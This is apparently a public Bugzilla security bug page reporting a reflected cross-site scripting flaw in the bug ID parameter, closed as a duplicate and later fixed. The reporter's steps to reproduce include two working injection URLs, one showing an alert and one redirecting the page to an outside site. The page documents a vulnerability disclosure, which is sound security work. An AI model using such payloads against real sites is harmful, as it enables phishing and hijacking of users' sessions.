Closed
Bug 842096
Opened 13 years ago
Closed 13 years ago
Reflected XSS in Bugzilla
Categories
(Bugzilla :: Creating/Changing Bugs, defect)
Tracking
()
RESOLVED
DUPLICATE
of bug 842038
People
(Reporter: breakthesecurity.com, Unassigned)
Details
(Keywords: reporter-external)
Attachments
(1 file)
25.71 KB,
image/jpeg
|
Details |
User Agent: Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0
Build ID: 20130201065344
Steps to reproduce:
Hi, I have identified a XSS vulnerability in BugZilla website. I have try to inject the XSS code in the bug id :
POC 1:
https://bugzilla.mozilla.org/show_bug.cgi?id=839897"><script>alert('E Hacking News')</script>&format=1
POC 2:
https://bugzilla.mozilla.org/show_bug.cgi?id=839897"><script>document.location="http://www.ehackingnews.com"</script>&format=1
Actual results:
It successfully Executed the injected code. Hackers can use this vulnerability for social engineering attack including phishing , redirecting malicious site and more.
I have attached the screenshot .
Expected results:
It should have sanitized the ID parameter . Escape the Special characters from the ID parameter.
![]() |
||
Comment 1•13 years ago
|
||
This bug has already been reported earlier today.
Assignee: nobody → create-and-change
Status: UNCONFIRMED → RESOLVED
Closed: 13 years ago
Component: General → Creating/Changing Bugs
Product: bugzilla.mozilla.org → Bugzilla
QA Contact: default-qa
Resolution: --- → DUPLICATE
Version: Production → 2.10
Comment 2•13 years ago
|
||
Wow, what are the odds that a bug sits latent for something like 8-10 years (more?) and then gets independently reported by two people 12 hours apart?
Flags: sec-bounty?
![]() |
Reporter | |
Comment 4•13 years ago
|
||
Everything started from Nokia Bug hunting. Bug in Nokia site lead to this bugzilla.
![]() |
||
Comment 5•13 years ago
|
||
breakthesecurity: can you tell us a bit more about this Nokia bug, and how it led you to find this bug?
Gerv
![]() |
||
Comment 7•13 years ago
|
||
Bug 842038 has been fixed and is now public. Removing the sec flag.
Group: bugzilla-security
![]() |
Reporter | |
Comment 8•13 years ago
|
||
Please remove the comment 6, as it leads to bug in lot of high profile sites
Updated•13 years ago
|
Flags: sec-bounty? → sec-bounty-
Updated•1 year ago
|
Keywords: reporter-external
You need to log in
before you can comment on or make changes to this bug.
Description
•